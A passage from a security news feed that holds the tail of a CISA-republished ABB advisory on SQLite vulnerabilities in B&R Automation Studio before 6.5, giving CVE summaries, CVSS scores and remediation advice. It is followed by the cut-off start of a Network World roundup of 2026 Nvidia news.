<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.0</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C">CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2017-10989</a></h3>
<div class="csaf-accordion-content">
<p>The getNodeSize function in ext/rtree/rtree.c in SQLite through 3.19.3, as used in GDAL and other products, mis-handles undersized RTree blobs in a crafted database, leading to a heap-based buffer over-read or possibly un-specified other impact.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2017-10989">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/125.html">CWE-125 Out-of-bounds Read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.0</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C">CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2016-6153</a></h3>
<div class="csaf-accordion-content">
<p>There exists a vulnerability in SQLite versions before 3.50.2 where the number of aggregate terms could exceed the number of columns available. This could lead to a memory corruption issue.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2016-6153">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.0</td>
<td>5.9</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C">CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2015-6607</a></h3>
<div class="csaf-accordion-content">
<p>SQLite before 3.8.9, as used in Android before 5.1.1 LMY48T, allows attackers to gain privileges via a crafted application, aka internal bug 20099586.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2015-6607">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/286.html">CWE-286 Incorrect User Management</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.0</td>
<td>3.7</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:C">CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2015-5895</a></h3>
<div class="csaf-accordion-content">
<p>Multiple unspecified vulnerabilities in SQLite before 3.8.10.2, as used in Apple iOS before 9, have unknown im-pact and attack vectors.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2015-5895">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/200.html">CWE-200 Exposure of Sensitive Information to an Unauthorized Actor</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2015-3717</a></h3>
<div class="csaf-accordion-content">
<p>Multiple buffer overflows in the printf functionality in SQLite, as used in Apple iOS before 8.4 and OS X before 10.10.4, allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via un-specified vectors.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2015-3717">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/120.html">CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.0</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C">CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2015-3416</a></h3>
<div class="csaf-accordion-content">
<p>The sqlite3VXPrintf function in printf.c in SQLite before 3.8.9 does not properly handle precision and width values during floating-point conversions, which allows context-dependent attackers to cause a denial of service (integer overflow and stack-based buffer overflow) or possibly have unspecified other impact via large integers in a crafted printf function call in a SELECT statement.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2015-3416">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB B&amp;R Automation Studio</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB B&amp;R Automation Studio &lt;6.5</div>
<div class="ics-status"><strong>Product Status:</strong><br>fixed, known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The problem is corrected in the following product versions: B&amp;R Automation Studio 6.5 B&amp;R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.</p>
<p><strong>Mitigation</strong><br>Refer to section “General security recommendations” for advice on how to keep your system secure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/190.html">CWE-190 Integer Overflow or Wraparound</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.0</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C">CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>ABB PSIRT reported these vulnerabilities to CISA.</li>
</ul>
<hr>
<h2>Notice</h2>
<p>The information in this document is subject to change without notice, and should not be construed as a commitment by B&amp;R. B&amp;R provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall B&amp;R or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if B&amp;R or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from B&amp;R, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners.</p>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability.</p>
<p>Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.</p>
<p>Locate control system networks and remote devices behind firewalls and isolate them from business networks.</p>
<p>When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<hr>
<h2>Advisory Conversion Disclaimer</h2>
<p>This ICSA is a verbatim republication of ABB PSIRT SA25P007 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory.</p>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-02-18</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-02-18</td>
<td>1</td>
<td>Initial version.</td>
</tr>
<tr>
<td>2026-05-21</td>
<td>2</td>
<td>Initial CISA Republication of ABB PSIRT SA25P007 advisory</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nvidia: Latest news and insights]]></title>
<description><![CDATA[More processor coverage on Network World:Intel news and insights | AMD news and insights



With its legacy of innovation in GPU technology, Nvidia has become a dominant force in the AI market. Nvidia’s list of partners reads like a technology who’s who list – including AWS, Google Cloud, Microso...]]></description>
<link>https://tsecurity.de/de/3534226/it-security-nachrichten/nvidia-latest-news-and-insights/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3534226/it-security-nachrichten/nvidia-latest-news-and-insights/</guid>
<pubDate>Wed, 20 May 2026 21:08:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="has-text-align-center"><strong>More processor coverage on Network World:<br><a href="https://www.networkworld.com/article/4021442/intel-latest-news-and-insights.html">Intel news and insights</a> <a href="https://www.networkworld.com/article/4021291/amd-latest-news-and-insights.html">| </a></strong><a href="https://www.networkworld.com/article/4021291/amd-latest-news-and-insights.html">AMD news and insights</a></p>



<p class="has-text-align-left">With its legacy of innovation in <a href="https://www.networkworld.com/article/2066534/nvidia-launches-blackwell-gpu-architecture.html">GPU technology</a>, <a href="https://www.nvidia.com/en-us/" target="_blank" rel="noreferrer noopener">Nvidia</a> has become a dominant force in the AI market. <a href="https://www.networkworld.com/article/2067515/nvidia-expands-partnership-with-hyperscalers-to-boost-ai-training-and-development.html">Nvidia’s list of partners</a> reads like a technology who’s who list – including AWS, Google Cloud, Microsoft Azure, Dell, HPE – and it spans key vertical industries such as healthcare, finance, automotive, and manufacturing.</p>



<p>From its gaming roots, Nvidia’s GPUs have evolved to power breakthroughs in scientific simulations, data analysis, and machine learning. Follow this page for the latest news, analysis, and features on Nvidia’s advancements and their impact on enterprise transformation.</p>



<h3 class="wp-block-heading">Startup Bolt Graphics promises 5x performance over Nvidia’s best GPU</h3>



<p><em>May 19, 2026</em>: It takes a brave company to go up against Nvidia in any market, let alone graphics performance. Intel tried and failed repeatedly, and AMD is barely hanging on. But <a href="https://www.networkworld.com/article/4173251/startup-bolt-graphics-promises-5x-performance-over-nvidias-best-gpu.html">Bolt Graphics thinks it has something</a> in its Zeus GPU.</p>



<h3 class="wp-block-heading">Nvidia’s ‘AI insurance policy’ balances immediate and future AI approaches</h3>



<p><em>April 27, 2026</em>: Cloud-hosted AI attracts extreme attention and investment. But what if the hype wave collapses? <a href="https://www.networkworld.com/article/4163253/nvidias-ai-insurance-policy-balances-immediate-and-future-ai-approaches.html">Nvidia’s challenge is to build interest</a> in the boring aspects of future AI business cases when the market’s focus is elsewhere.</p>



<h3 class="wp-block-heading">Nvidia Rubin GPUs may be delayed, slowing the next phase of AI infrastructure</h3>



<p><em>April 9, 2026</em>: Nvidia’s latest generation of AI chips, the <a href="https://www.networkworld.com/article/4156508/nvidia-rubin-gpus-may-be-delayed-slowing-the-next-phase-of-ai-infrastructure.html">Nvidia Rubin GPUs, expected to ship later this year</a>, may face supply delays amid ongoing geopolitical pressures and supply chain constraints.</p>



<h3 class="wp-block-heading">Nvidia’s SchedMD acquisition puts open-source AI scheduling under scrutiny</h3>



<p><em>April 7, 2026</em>: Nvidia’s recent acquisition of SchedMD, the company behind the Slurm workload manager, is <a href="https://www.computerworld.com/article/4154994/nvidias-schedmd-acquisition-puts-open-source-ai-scheduling-under-scrutiny-2.html">raising concerns among AI industry executives</a> and supercomputing specialists who fear the chip giant could use its new position to favor its own hardware over competing chips, whether through code prioritization or roadmap decisions.</p>



<h3 class="wp-block-heading">Nvidia overhauls the data center for OpenClaw era</h3>



<p><em>March 20, 2026</em>: <a href="https://www.networkworld.com/article/4148130/nvidia-overhauls-the-data-center-for-openclaw-era.html">Inference is the core data-center workload</a>, and tokens are the new commodity of the AI era, says Nvidia. Recalling the classic data center during a keynote at GTC, CEO Jensen Huang said “it used to be … for files. It’s now a factory to generate tokens.”</p>



<h3 class="wp-block-heading">Nvidia joins push for data centers in space</h3>



<p><em>March 19, 2026</em>: <a href="https://www.networkworld.com/article/4147626/nvidia-joins-push-for-data-centers-in-space.html">Nvidia shared plans to bring AI and accelerated computing to space</a>, joining a slew of other tech giants with out-of-this-world computing ideas.</p>



<h3 class="wp-block-heading">Nvidia CEO Huang talks up ‘tokenomics’ — the new currency for AI</h3>



<p><em>March 17, 2026:</em> <a href="https://www.computerworld.com/article/4146468/nvidia-ceo-huang-talks-up-tokenomics-the-new-currency-for-ai.html">AI tokens are emerging as a kind of currency</a> that will help in recruitment, budgeting and productivity, Nvidia’s CEO Jensen Huang said during a keynote address at the company’s GTC conference.</p>



<h3 class="wp-block-heading">Nvidia announces Vera Rubin platform, signaling a shift to full-stack AI infrastructure</h3>



<p><em>March 17, 2026</em>: <a href="https://www.networkworld.com/article/4146173/nvidia-announces-vera-rubin-platform-signaling-a-shift-to-full-stack-ai-infrastructure.html">Nvidia introduced its Vera Rubin platform</a>, which combines compute, networking, and data processing into rack-scale deployments for large AI data centers, underscoring a shift in hyperscale environments toward more tightly integrated infrastructure.</p>



<h3 class="wp-block-heading">Why Nvidia’s DGX Rubin NVL8 runs on Intel Xeon 6</h3>



<p><em>March 17, 2026</em>: Despite growing rivalry between the two chip makers, <a href="https://www.networkworld.com/article/4146214/system-level-coopetition-why-nvidias-dgx-rubin-nvl8-runs-on-intel-xeon-6.html">AI systems from Nvidia will use CPUs from Intel</a> to maintain x86 continuity across data‑center workflows. Specifically, Nvidia has selected Intel’s Xeon 6 processors as the host CPUs for its Nvidia DGX Rubin NVL8 systems. </p>



<h3 class="wp-block-heading">Nvidia NemoClaw promises to run OpenClaw agents securely</h3>



<p><em>March 17, 2026</em>: In the few short weeks since OpenClaw became the biggest story in agentic AI, it has been dogged by concerns that it is not secure enough to be safely let loose in enterprises. This week at the Nvidia GTC conference, <a href="https://www.cio.com/article/4146545/nvidia-nemoclaw-promises-to-run-openclaw-agents-securely.html">CEO Jensen Huang announced what he believes is the answer: NemoClaw</a>. Built in consultation with OpenClaw’s creator, NemoClaw is based on Nvidia Agent Toolkit, part of the broader NeMo ecosystem for building AI agents.</p>



<h3 class="wp-block-heading">Nvidia targets inference as AI’s next battleground with Groq 3 LPX</h3>



<p><em>March 17, 2026</em>: <a href="https://www.networkworld.com/article/4146684/nvidia-targets-inference-as-ais-next-battleground-with-groq-3-lpx.html">Groq 3 LPX was announced at Nvidia GTC</a> as part of an architecture comprising seven new chips and five racks meant to work together as “one big supercomputer.” The company says its new architecture marks a shift from training-focused infrastructure to systems optimized for continuous, low-latency enterprise AI workloads.</p>



<h3 class="wp-block-heading">Vendors tout Nvidia partnerships as Nvidia GTC 2026 kicks off</h3>



<ul class="wp-block-list">
<li><a href="https://www.networkworld.com/article/4145989/hpe-nvidia-expand-ai-partnership.html">HPE and Nvidia have boosted their partnership</a>, adding a new server blade, GPU support, enhancements to HPE’s turnkey private AI package, and services targeting enterprise customers with growing AI workloads.</li>



<li><a href="https://www.networkworld.com/article/4145884/cisco-extends-its-secure-ai-factory-with-nvidia.html">Cisco extends its Secure AI Factory with Nvidia</a>: The two vendors announced the expansion of their jointly developed Secure AI Factory with Nvidia, which melds Cisco security and networking technology, Nvidia DPUs and AI Enterprise software, and multivendor storage options.</li>



<li><a href="https://www.networkworld.com/article/4147203/lenovo-bolsters-hybrid-ai-platform-with-nvidia-gpus.html">Lenovo bolsters hybrid AI platform with Nvidia GPUs</a>: Lenovo is expanding its Lenovo Hybrid AI Advantage with Nvidia platform and positioning it as an end-to-end path for production AI inferencing.</li>



<li><a href="https://www.networkworld.com/article/4145858/palantir-partners-with-nvidia-to-streamline-ai-data-center-deployment.html">Palantir partners with Nvidia to streamline AI data center deployment</a>: Two of the companies most synonymous with the AI revolution, Nvidia and Palantir Technologies, have linked arms to create an AI reference architecture operating system.</li>
</ul>



<h3 class="wp-block-heading">Nvidia launches Nemotron 3 Super to power enterprise AI agents</h3>



<p><em>March 12, 2026</em>: <a href="https://www.infoworld.com/article/4144135/nvidia-launches-nemotron-3-super-to-power-enterprise-ai-agents.html">Nvidia introduced a new reasoning-focused AI model </a>that combines multiple neural network architectures in a bid to improve how enterprise systems handle complex tasks and automation.</p>



<h3 class="wp-block-heading">Nvidia partners with optics technology vendors Lumentum and Coherent to enhance AI infrastructure</h3>



<p><em>March 2, 2026</em>: <a href="https://www.networkworld.com/article/4139643/nvidia-partners-with-optics-technology-vendors-lumentum-and-coherent-to-enhance-ai-infrastructure.html">Nvidia announced strategic partnerships with Lumentum Holdings and Coherent</a>, which it said are designed to accelerate the development of advanced optics technologies used in AI data center infrastructure.</p>



<h3 class="wp-block-heading">Nvidia partners with telecom providers for open 6G networks</h3>



<p><em>March 2, 2026</em>: Nvidia has partnered with global telecom providers for a commitment to<a href="https://www.networkworld.com/article/4139428/nvidia-partners-with-telecom-providers-for-open-6g-networks.html"> build 6G on open and secure AI-native platforms</a>, bringing software-defined networking to telecommunications. Announced at the Mobile World Congress conference, the list of Nvidia partners is a who’s who of telecom.</p>



<h3 class="wp-block-heading">Nvidia plans a Windows PC SoC, setting up direct competition with Qualcomm, Intel, and AMD</h3>



<p><em>February 24, 2026</em>: <a href="https://www.computerworld.com/article/4136489/nvidia-plans-a-windows-pc-soc-setting-up-direct-competition-with-qualcomm-intel-and-amd.html">Nvidia is developing a system-on-chip for Windows PCs</a>, with Dell and Lenovo among the OEMs planning to build notebooks and desktops around the processor later this year.</p>



<h3 class="wp-block-heading">Nvidia lines up partners to boost security for industrial operations</h3>



<p><em>February 23, 2026</em>: <a href="https://www.networkworld.com/article/4136174/nvidia-lines-up-partners-to-boost-security-for-industrial-operations.html">Nvidia extended its collaborations with a handful of security vendors </a>in an effort to improve real-time threat detection and response across operational technology  environments and industrial control systems.</p>



<h3 class="wp-block-heading">Meta scoops up more of Nvidia’s AI chip output</h3>



<p><em>February 20, 2026</em>: AI’s insatiable demand for chips has already had an effect on the IT market, and it could be about to get worse: <a href="https://www.networkworld.com/article/4135325/meta-scoops-up-more-of-nvidias-ai-chip-output.html">Nvidia has entered into a multi-year partnership with Meta</a> to fill the social network’s new AI data centers with its cutting-edge processors.</p>



<h3 class="wp-block-heading">Nvidia claims 10x cost savings with open-source inference models</h3>



<p><em>February 13, 2026</em>: Nvidia has released analysis showing a 4X to 10X reduction in cost per token for AI inferencing by switching to open source models. The <a href="https://www.networkworld.com/article/4132357/nvidia-claims-10x-cost-savings-with-open-source-inference-models.html">cost reductions were achieved by pairing Nvidia’s Blackwell GPUs</a> with open-source models from Baseten, DeepInfra, Fireworks AI, and Together AI. </p>



<h3 class="wp-block-heading">Reports of Nvidia/OpenAI deal in jeopardy are overblown, says Nvidia’s CEO Huang</h3>



<p><em>February 5, 2026</em>: Nvidia CEO Jensen Huang told CNBC  there was no validity to the rumors that he is reconsidering scaling back on his <a href="https://www.networkworld.com/article/4128229/reports-of-nvidia-openai-deal-in-jeopardy-are-overblown-says-nvidias-ceo-huang.html">$100 billion investment in data centers for OpenAI</a>, in sharp contrast to reports from the Wall Street Journal.</p>



<h3 class="wp-block-heading">Eying AI factories, Nvidia buys bigger stake in CoreWeave</h3>



<p><em>February 2, 2026</em>: <a href="https://www.networkworld.com/article/4125806/eying-ai-factories-nvidia-buys-bigger-stake-in-coreweave.html">Nvidia continues to throw its sizable bank account around</a>. This time making a $2 billion investment in GPU cloud service provider CoreWeave. The company says the investment reflects Nvidia’s “confidence in CoreWeave’s business, team and growth strategy as a cloud platform built on Nvidia infrastructure.</p>



<h3 class="wp-block-heading">China clears Nvidia H200 sales to tech giants, reshaping AI data center plans</h3>



<p><em>January 29, 2026</em>: <a href="https://www.networkworld.com/article/4124281/china-clears-nvidia-h200-sales-to-tech-giants-reshaping-ai-data-center-plans.html">China has reopened access to Nvidia’s advanced AI processors</a>, granting approvals to a small group of its largest technology companies. The companies include ByteDance, Alibaba, and Tencent, which are expected to collectively purchase more than 400,000 of Nvidia’s H200 accelerators</p>



<h3 class="wp-block-heading">Nvidia is still working with suppliers on RAM chips for Rubin</h3>



